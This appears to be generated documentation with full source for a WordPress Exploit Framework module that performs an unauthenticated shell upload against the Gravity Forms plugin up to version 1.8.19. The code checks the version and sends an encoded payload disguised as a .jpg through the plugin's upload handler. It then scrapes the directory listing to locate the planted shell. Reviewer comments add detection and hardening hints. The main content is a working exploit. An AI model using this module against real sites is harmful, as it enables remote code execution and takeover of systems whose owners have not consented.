class Wpxf::Exploit::GravityFormsV1819ShellUpload

Public Class Methods

new()
Calls superclass method Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/gravity_forms_v1.8.19_shell_upload.rb, line 6
# Builds the module: runs the parent initializer, records the module's
# metadata and declares the one option this module adds.
#
# The metadata names Gravity Forms <= 1.8.19 as the affected range,
# cites WPVDB entry 7820 and carries the date Dec 08 2014.
#
# The `form_id` option is an integer, required, and defaults to 1.
#
# NOTE(review): the title describes the upload as unauthenticated, so
# sites still on an affected release should presumably treat upgrading
# as urgent; confirm the fixed release against the WPVDB entry.
def initialize
  super

  module_info = {
    name: 'Gravity Forms <= 1.8.19 Unauthenticated Shell Upload',
    author: [
      'Sucuri.net', # Discovery and disclosure
      'rastating'   # WPXF module
    ],
    references: [['WPVDB', '7820']],
    date: 'Dec 08 2014'
  }
  update_info(**module_info)

  form_id_settings = {
    name: 'form_id',
    desc: 'A valid Gravity Forms form ID',
    default: 1,
    required: true
  }
  register_option(IntegerOption.new(**form_id_settings))
end

Public Instance Methods

check()
# File lib/wpxf/modules/exploit/shell/gravity_forms_v1.8.19_shell_upload.rb, line 31
# Version check based on the plugin's change log.
#
# Builds the URL of `gravityforms/change_log.txt` under the plugins
# directory and hands it to `check_version_from_custom_file` together
# with a pattern that captures a dotted version number after the word
# "Version" and the version string '1.8.20'.
#
# NOTE(review): '1.8.20' is presumably the first fixed release (the
# module title says <= 1.8.19); confirm against the helper's contract.
# NOTE(review): this check only works because change_log.txt is served
# to anonymous clients; denying web access to that file removes the
# version disclosure.
#
# @return whatever `check_version_from_custom_file` returns
def check
  changelog_url = normalize_uri(wordpress_url_plugins, 'gravityforms', 'change_log.txt')
  version_pattern = /Version\s+(\d+\.\d+(\.\d+)*)/
  fixed_version = '1.8.20'
  check_version_from_custom_file(changelog_url, version_pattern, fixed_version)
end
form_id()
# File lib/wpxf/modules/exploit/shell/gravity_forms_v1.8.19_shell_upload.rb, line 36
# Current value of the `form_id` option, as returned by
# `normalized_option_value`.
#
# @return the normalized option value (the option is registered as an
#   IntegerOption, so presumably an Integer; confirm in the helper)
def form_id
  option_name = 'form_id'
  normalized_option_value(option_name)
end
payload_body_builder()
# File lib/wpxf/modules/exploit/shell/gravity_forms_v1.8.19_shell_upload.rb, line 51
# Assembles the multipart body for the upload request.
#
# Fields added, in order: `name` (set to `payload_name`), `field_id`
# (always 1) and a file part called `file` whose content is
# `payload.encoded` and whose filename is five random letters followed
# by ".jpg".
#
# NOTE(review): the filename sent with the file part always ends in
# .jpg, whatever `payload_name` is. Server-side validation and
# detection should therefore look at the name a file is finally stored
# under, not only at the multipart filename.
#
# @return [Utility::BodyBuilder] the populated builder
def payload_body_builder
  Utility::BodyBuilder.new.tap do |body|
    body.add_field('name', payload_name)
    body.add_field('field_id', 1)

    content = payload.encoded
    part_filename = "#{Utility::Text.rand_alpha(5)}.jpg"
    body.add_file_from_string('file', content, part_filename)
  end
end
scrape_upload_folder()
# File lib/wpxf/modules/exploit/shell/gravity_forms_v1.8.19_shell_upload.rb, line 59
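# Looks up the per-form upload directory by reading the listing of
# `<uploads>/gravity_forms`.
#
# The listing is requested with a GET; the first `href` whose value
# starts with "<form_id>-" followed by letters, digits or slashes is
# taken as the directory name.
#
# Changes from the previous version:
# * a missing response (nil) no longer raises NoMethodError while the
#   status code is being reported;
# * a 200 response with no matching link is reported as an error
#   instead of emitting "Found directory: " with an empty name.
#
# NOTE(review): the lookup depends on the web server publishing a
# directory index for the uploads folder; disabling directory listing
# there removes this information leak.
#
# @return [String, nil] the directory name, or nil when the listing
#   could not be fetched or contains no matching entry
def scrape_upload_folder
  emit_info 'Scraping target for the upload location...'
  uploads_url = normalize_uri(wordpress_url_uploads, 'gravity_forms')
  res = execute_get_request(url: uploads_url)

  unless res && res.code == 200
    emit_error 'The target appears to have directory listing disabled'
    # res is nil when the request produced no response at all.
    emit_error "Code: #{res.code}", true if res
    return nil
  end

  name = res.body.to_s[/href="(#{form_id}\-[a-z0-9\/]+?)"/i, 1]
  unless name
    emit_error "No upload directory for form #{form_id} was found in the listing"
    return nil
  end

  emit_success "Found directory: #{name}"
  name
end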
upload_request_params()
# File lib/wpxf/modules/exploit/shell/gravity_forms_v1.8.19_shell_upload.rb, line 44
# Query parameters sent with the upload request: `gf_page` is the
# literal "upload" and `form_id` is the configured form ID.
#
# NOTE(review): requests carrying `gf_page=upload` are a concrete
# string to search for in web server access logs when investigating
# this issue.
#
# @return [Hash{String => Object}] the two request parameters
def upload_request_params
  params = {}
  params['gf_page'] = 'upload'
  params['form_id'] = form_id
  params
end
uploaded_payload_location()
# File lib/wpxf/modules/exploit/shell/gravity_forms_v1.8.19_shell_upload.rb, line 87
# URL at which the uploaded file is expected to be reachable.
#
# The URL is `<uploads>/gravity_forms/<directory>/tmp/` followed by
# `_input_<form_id>_<payload_name>`, where `<directory>` comes from
# `scrape_upload_folder`.
#
# NOTE(review): files named `_input_*` under a `gravity_forms/*/tmp`
# folder are therefore what to look for on disk during incident
# response; denying script execution inside the uploads directory is
# the usual hardening for this class of issue.
#
# @return [String, false] the URL, or false when no upload directory
#   was found
def uploaded_payload_location
  folder = scrape_upload_folder
  if folder
    uploads_root = wordpress_url_uploads
    stored_name = "_input_#{form_id}_#{payload_name}"
    normalize_uri(uploads_root, 'gravity_forms', folder, 'tmp', stored_name)
  else
    false
  end
end
uploader_url()
# File lib/wpxf/modules/exploit/shell/gravity_forms_v1.8.19_shell_upload.rb, line 40
# URL the upload request is sent to. This is simply `full_uri`; the
# upload handler is selected by the query parameters, not by a
# dedicated path.
#
# @return the value of `full_uri`
def uploader_url
  endpoint = full_uri
  endpoint
end
validate_upload_result()
# File lib/wpxf/modules/exploit/shell/gravity_forms_v1.8.19_shell_upload.rb, line 75
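# Decides whether the upload request was accepted.
#
# The upload counts as failed when there is no response, when the
# status code is not 200, when the body is not a JSON object, or when
# the object's `status` field equals "error".
#
# Changes from the previous version:
# * a 200 response whose body is not valid JSON (for example an HTML
#   error page) now returns false instead of raising JSON::ParserError;
# * a JSON body that is not an object returns false rather than being
#   indexed with a string key;
# * an error object without a nested `error.message` no longer raises
#   NoMethodError while the failure is being reported.
#
# @return [Boolean] true when the response does not report an error
def validate_upload_result
  return false unless upload_result && upload_result.code == 200

  begin
    res = JSON.parse(upload_result.body)
  rescue JSON::ParserError, TypeError
    emit_error 'Upload failed: the response body was not valid JSON'
    return false
  end

  unless res.is_a?(Hash)
    emit_error 'Upload failed: the response was not a JSON object'
    return false
  end

  if res['status'] == 'error'
    details = res['error']
    message = details.is_a?(Hash) ? details['message'] : details
    emit_error "Upload failed: #{message}"
    return false
  end

  true
end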